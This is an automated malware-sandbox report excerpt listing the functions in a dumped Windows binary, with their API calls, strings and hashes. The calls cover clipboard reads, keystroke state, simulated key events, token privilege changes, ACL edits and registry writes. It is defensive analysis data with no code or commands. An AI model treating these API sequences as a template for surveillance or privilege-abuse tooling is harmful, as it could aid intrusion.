Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: 685cd33f304599776b79cecb9d57b6ae5abbe5ddf870b287fcbedf8340f64758
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: 96B0123198030C73DE112541FC03F253B0D4740B50F110021FE0C1C1F1A5D3766040C9

Function 007DC270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 007D4005: FindFirstFileW.KERNEL32(?,?), ref: 007D407C
Part of subcall function 007D4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 007D40CC
Part of subcall function 007D4005: FindNextFileW.KERNEL32(00000000,00000010), ref: 007D40DD
Part of subcall function 007D4005: FindClose.KERNEL32(00000000), ref: 007D40F4

GetLastError.KERNEL32 ref: 007DC292

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 04f6ddc5be352773ecbf42d7337a7c68d5fee979fb211aab806c2edaa72a6e75
Instruction ID: 64406521df6fb31e6bda35442312506234dae8f3895a92daad87db101a36152d
Opcode Fuzzy Hash: 04f6ddc5be352773ecbf42d7337a7c68d5fee979fb211aab806c2edaa72a6e75
Instruction Fuzzy Hash: FFF058323102108FCB21EB59D859B6AB7E5AF88360F05805AFA499B352CB78B801CB94

Non-executed Functions

Function 007FD164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007FD208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FD249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007FD28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FD2B8
SendMessageW.USER32 ref: 007FD2E1
_wcsncpy.LIBCMT ref: 007FD359
GetKeyState.USER32(00000011), ref: 007FD37A
GetKeyState.USER32(00000009), ref: 007FD387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FD39D
GetKeyState.USER32(00000010), ref: 007FD3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FD3D0
SendMessageW.USER32 ref: 007FD3F7
SendMessageW.USER32(?,00001030,?,007FB9BA), ref: 007FD4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007FD513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007FD526
SetCapture.USER32(?), ref: 007FD52F
ClientToScreen.USER32(?,?), ref: 007FD594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007FD5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007FD5BB
ReleaseCapture.USER32 ref: 007FD5C6
GetCursorPos.USER32(?), ref: 007FD600
ScreenToClient.USER32(?,?), ref: 007FD60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD669
SendMessageW.USER32 ref: 007FD697
SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD6D4
SendMessageW.USER32 ref: 007FD703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007FD724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 007FD733
GetCursorPos.USER32(?), ref: 007FD753
ScreenToClient.USER32(?,?), ref: 007FD760
GetParent.USER32(?), ref: 007FD780
SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD7E9
SendMessageW.USER32 ref: 007FD81A
ClientToScreen.USER32(?,?), ref: 007FD878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007FD8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD8D2
SendMessageW.USER32 ref: 007FD8F5
ClientToScreen.USER32(?,?), ref: 007FD947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007FD97B

Part of subcall function 007729AB: GetWindowLongW.USER32(?,000000EB), ref: 007729BC

GetWindowLongW.USER32(?,000000F0), ref: 007FDA17

Strings

@GUI_DRAGID, xrefs: 007FD562
F, xrefs: 007FD8FB

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: a4511c23a6336752866fdb3fb777a3d435b7fe287e7b8d8c3befa47227a61fc6
Instruction ID: d34f0fbacebad5101ca227e3a42fe8b5d47c2be7c4ca67389a61e1190d6f0e56
Opcode Fuzzy Hash: a4511c23a6336752866fdb3fb777a3d435b7fe287e7b8d8c3befa47227a61fc6
Instruction Fuzzy Hash: E2427B702042499FD724DF28C848BAABBE6FF89310F140619F7A5873A1D775EC54DB91

Function 00785EDA Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00785EE2
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C10D7
IsIconic.USER32(?), ref: 007C10E0
ShowWindow.USER32(?,00000009), ref: 007C10ED
SetForegroundWindow.USER32(?), ref: 007C10F7
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007C110D
GetCurrentThreadId.KERNEL32 ref: 007C1114
GetWindowThreadProcessId.USER32(?,00000000), ref: 007C1120
AttachThreadInput.USER32(?,00000000,00000001), ref: 007C1131
AttachThreadInput.USER32(?,00000000,00000001), ref: 007C1139
AttachThreadInput.USER32(00000000,?,00000001), ref: 007C1141
SetForegroundWindow.USER32(?), ref: 007C1144
MapVirtualKeyW.USER32(00000012,00000000), ref: 007C1159
keybd_event.USER32(00000012,00000000), ref: 007C1164
MapVirtualKeyW.USER32(00000012,00000000), ref: 007C116E
keybd_event.USER32(00000012,00000000), ref: 007C1173
MapVirtualKeyW.USER32(00000012,00000000), ref: 007C117C
keybd_event.USER32(00000012,00000000), ref: 007C1181
MapVirtualKeyW.USER32(00000012,00000000), ref: 007C118B
keybd_event.USER32(00000012,00000000), ref: 007C1190
SetForegroundWindow.USER32(?), ref: 007C1193
AttachThreadInput.USER32(?,?,00000000), ref: 007C11BA

Strings

Shell_TrayWnd, xrefs: 007C10D2

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 08f0c0bd05be166b482e762efcdbb7170e1cca1c8bad589bd00d63cd3da4241f
Instruction ID: 587849f00ab80a7d861fb452bbc2dd767f410a41c05f262d5746580de13b7835
Opcode Fuzzy Hash: 08f0c0bd05be166b482e762efcdbb7170e1cca1c8bad589bd00d63cd3da4241f
Instruction Fuzzy Hash: 02317371A4031C7BEB216B619C4AF7F3F6DFB45B50F14402AFA04BA1D1CAB55D50AEA0

Function 007C8F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 007C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C93E3
Part of subcall function 007C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C9410
Part of subcall function 007C9399: GetLastError.KERNEL32 ref: 007C941D

_memset.LIBCMT ref: 007C8F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007C8FC3
CloseHandle.KERNEL32(?), ref: 007C8FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007C8FEB
GetProcessWindowStation.USER32 ref: 007C9004
SetProcessWindowStation.USER32(00000000), ref: 007C900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007C9028

Part of subcall function 007C8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C8F27), ref: 007C8DFE
Part of subcall function 007C8DE9: CloseHandle.KERNEL32(?,?,007C8F27), ref: 007C8E10

Strings

default, xrefs: 007C9023
, xrefs: 007C8F80
winsta0, xrefs: 007C8FE6

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: f728518d6fbdd603e46dc59c214672ef636ce3c17a8a4529ebf9d68fef4cc370
Instruction ID: 452fbd277c5de89b0264ee76da6235071f376f70c3d4d13ad6be50efb56a8756
Opcode Fuzzy Hash: f728518d6fbdd603e46dc59c214672ef636ce3c17a8a4529ebf9d68fef4cc370
Instruction Fuzzy Hash: D08148B190420DBFDF519FA4DC4AFEE7B79BF04304F08411DFA10A6261DB3A8A159B61

Function 007E4632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00800980), ref: 007E465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 007E466A
GetClipboardData.USER32(0000000D), ref: 007E4672
CloseClipboard.USER32 ref: 007E467E
GlobalLock.KERNEL32(00000000), ref: 007E469A
CloseClipboard.USER32 ref: 007E46A4
GlobalUnlock.KERNEL32(00000000,00000000), ref: 007E46B9
IsClipboardFormatAvailable.USER32(00000001), ref: 007E46C6
GetClipboardData.USER32(00000001), ref: 007E46CE
GlobalLock.KERNEL32(00000000), ref: 007E46DB
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 007E470F
CloseClipboard.USER32 ref: 007E481F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 35304d4d88814f985f664b358bc2f366e216654f90ffd6a2f18dfc4e8741ba1d
Instruction ID: db46a3a4eea26a13d05df09005d46a0f859d3174f9f11b455da9284ed5d986fb
Opcode Fuzzy Hash: 35304d4d88814f985f664b358bc2f366e216654f90ffd6a2f18dfc4e8741ba1d
Instruction Fuzzy Hash: AF51DC31245381ABD300EF61DC89F6E73A8BF98B40F000529F65AD22E1DF78D8058F66

Function 007DF5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 007DF5F9
_wcscmp.LIBCMT ref: 007DF60E
_wcscmp.LIBCMT ref: 007DF625
GetFileAttributesW.KERNEL32(?), ref: 007DF637
SetFileAttributesW.KERNEL32(?,?), ref: 007DF651
FindNextFileW.KERNEL32(00000000,?), ref: 007DF669
FindClose.KERNEL32(00000000), ref: 007DF674
FindFirstFileW.KERNEL32(*.*,?), ref: 007DF690
_wcscmp.LIBCMT ref: 007DF6B7
_wcscmp.LIBCMT ref: 007DF6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 007DF6E0
SetCurrentDirectoryW.KERNEL32(0082B578), ref: 007DF6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF708
FindClose.KERNEL32(00000000), ref: 007DF715
FindClose.KERNEL32(00000000), ref: 007DF727

Strings

S}, xrefs: 007DF6E2
*.*, xrefs: 007DF68B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*$S}
API String ID: 1803514871-2863189289
Opcode ID: 587fe9491fbb95030189621e9cf3dffb1edbfd88b5c684ad6f0c7bce3a06f415
Instruction ID: 8165a75c1f5ed666bc5abf5a910d83f9dab933f21b9d68b8b93cd01af3c5fd05
Opcode Fuzzy Hash: 587fe9491fbb95030189621e9cf3dffb1edbfd88b5c684ad6f0c7bce3a06f415
Instruction Fuzzy Hash: 00319571641219BADF509FB4EC4DAEE77BCEF09321F540166F816E22A0DB38DA44DE60

Function 007DCD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007DCDD0
FindClose.KERNEL32(00000000), ref: 007DCE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DCE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DCE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 007DCE87
__swprintf.LIBCMT ref: 007DCED3
__swprintf.LIBCMT ref: 007DCF16

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

__swprintf.LIBCMT ref: 007DCF6A

Part of subcall function 007938C8: __woutput_l.LIBCMT ref: 00793921

__swprintf.LIBCMT ref: 007DCFB8

Part of subcall function 007938C8: __flsbuf.LIBCMT ref: 00793943
Part of subcall function 007938C8: __flsbuf.LIBCMT ref: 0079395B

__swprintf.LIBCMT ref: 007DD007
__swprintf.LIBCMT ref: 007DD056
__swprintf.LIBCMT ref: 007DD0A5

Strings

%4d, xrefs: 007DCF10
%02d, xrefs: 007DCF5E, 007DCF68, 007DCFB6, 007DD005, 007DD054, 007DD0A3
%4d%02d%02d%02d%02d%02d, xrefs: 007DCECD

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 194bd1e24c39801518e8c53060e7fd8acb68d3cc43991ccb8cfcf244c4e19058
Instruction ID: 1bce222e9a643b1aa5f505217226e0306c9372204d89ad3c560e6eca9d40d9cd
Opcode Fuzzy Hash: 194bd1e24c39801518e8c53060e7fd8acb68d3cc43991ccb8cfcf244c4e19058
Instruction Fuzzy Hash: 28A13DB1404305EBD715EBA4D989DAFB7ECFF94700F404919F589C6191EB38EA09CBA2

Function 007F0EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00800980,00000000,?,00000000,?,?), ref: 007F1021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007F1069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007F10F2
RegCloseKey.ADVAPI32(?), ref: 007F1412
RegCloseKey.ADVAPI32(00000000), ref: 007F141F

Strings

REG_EXPAND_SZ, xrefs: 007F108F
REG_QWORD, xrefs: 007F1360
REG_BINARY, xrefs: 007F13AD
REG_MULTI_SZ, xrefs: 007F11DA
REG_SZ, xrefs: 007F1130
REG_DWORD, xrefs: 007F12E3

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: d200f459c3e7ae8959d2a25ab8df189f7a6aadc924586bd02c420c048d72f754
Instruction ID: 3c5b974fb452d10821406128dd331c05df517947c58689cab352f6ef24fbcc54
Opcode Fuzzy Hash: d200f459c3e7ae8959d2a25ab8df189f7a6aadc924586bd02c420c048d72f754
Instruction Fuzzy Hash: B1022675200615DFCB24EF25C855A2AB7E5FF89710F04895CFA9A9B362CB38EC41CB91

Function 007DF735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 007DF756
_wcscmp.LIBCMT ref: 007DF76B
_wcscmp.LIBCMT ref: 007DF782

Part of subcall function 007D4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007D4890

FindNextFileW.KERNEL32(00000000,?), ref: 007DF7B1
FindClose.KERNEL32(00000000), ref: 007DF7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 007DF7D8
_wcscmp.LIBCMT ref: 007DF7FF
_wcscmp.LIBCMT ref: 007DF816
SetCurrentDirectoryW.KERNEL32(?), ref: 007DF828
SetCurrentDirectoryW.KERNEL32(0082B578), ref: 007DF846
FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF850
FindClose.KERNEL32(00000000), ref: 007DF85D
FindClose.KERNEL32(00000000), ref: 007DF86F

Strings

*.*, xrefs: 007DF7D3
j}, xrefs: 007DF82A

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*$j}
API String ID: 1824444939-110696414
Opcode ID: 42ebf6451e9a48b0863a2bef7584ceb7351c4a4b2623157253bb21b4af12f372
Instruction ID: 1978482bd5678b78cc21e95c87b5d2ed0da2f6fc54aeacf1964e96f8f0c223de
Opcode Fuzzy Hash: 42ebf6451e9a48b0863a2bef7584ceb7351c4a4b2623157253bb21b4af12f372
Instruction Fuzzy Hash: 5231B871501219BEDF10ABB4EC48ADE77BCEF09321F104166E815E63A1DB38DE459F51

Function 007C88CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8E3C
Part of subcall function 007C8E20: GetLastError.KERNEL32(?,007C8900,?,?,?), ref: 007C8E46
Part of subcall function 007C8E20: GetProcessHeap.KERNEL32(00000008,?,?,007C8900,?,?,?), ref: 007C8E55
Part of subcall function 007C8E20: HeapAlloc.KERNEL32(00000000,?,007C8900,?,?,?), ref: 007C8E5C
Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8E73

Part of subcall function 007C8EBD: GetProcessHeap.KERNEL32(00000008,007C8916,00000000,00000000,?,007C8916,?), ref: 007C8EC9
Part of subcall function 007C8EBD: HeapAlloc.KERNEL32(00000000,?,007C8916,?), ref: 007C8ED0
Part of subcall function 007C8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007C8916,?), ref: 007C8EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C8931
_memset.LIBCMT ref: 007C8946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C8965
GetLengthSid.ADVAPI32(?), ref: 007C8976
GetAce.ADVAPI32(?,00000000,?), ref: 007C89B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C89CF
GetLengthSid.ADVAPI32(?), ref: 007C89EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007C89FB
HeapAlloc.KERNEL32(00000000), ref: 007C8A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C8A23
CopySid.ADVAPI32(00000000), ref: 007C8A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C8A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C8A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C8A95

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: f16d53b53266bfbce8790af0ff32d0758d3f9cb26690006afec17ba79f9cf1ff
Instruction ID: 2b773c433b1d5d5d8a16738fd1dc5c8020f4d99afeda8f18582fbacd97542c53
Opcode Fuzzy Hash: f16d53b53266bfbce8790af0ff32d0758d3f9cb26690006afec17ba79f9cf1ff
Instruction Fuzzy Hash: C4610675A00209EFDF40DFA5DC45FEEBB79BB44300F04812EE915AA291DB399A15CFA1

Function 007F0A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0B0C

Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007F0BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007F0C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007F0E82
RegCloseKey.ADVAPI32(00000000), ref: 007F0E8F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: e55ba4d0c08330279ff6ba2a2f8cb4e9f6aa26abfb0fa01d7d5b421f40dd2785
Instruction ID: 7b397809ab43630b7e9ab929d78811a1b25570e095095042f41271f9a78e563a
Opcode Fuzzy Hash: e55ba4d0c08330279ff6ba2a2f8cb4e9f6aa26abfb0fa01d7d5b421f40dd2785
Instruction Fuzzy Hash: 13E13A71204214EFCB14EF25C895E2ABBE9EF89714F04896DF949DB362DA34E901CB91

Function 007D0508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 007D0530
GetAsyncKeyState.USER32(000000A0), ref: 007D05B1
GetKeyState.USER32(000000A0), ref: 007D05CC
GetAsyncKeyState.USER32(000000A1), ref: 007D05E6
GetKeyState.USER32(000000A1), ref: 007D05FB
GetAsyncKeyState.USER32(00000011), ref: 007D0613
GetKeyState.USER32(00000011), ref: 007D0625
GetAsyncKeyState.USER32(00000012), ref: 007D063D
GetKeyState.USER32(00000012), ref: 007D064F
GetAsyncKeyState.USER32(0000005B), ref: 007D0667
GetKeyState.USER32(0000005B), ref: 007D0679

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
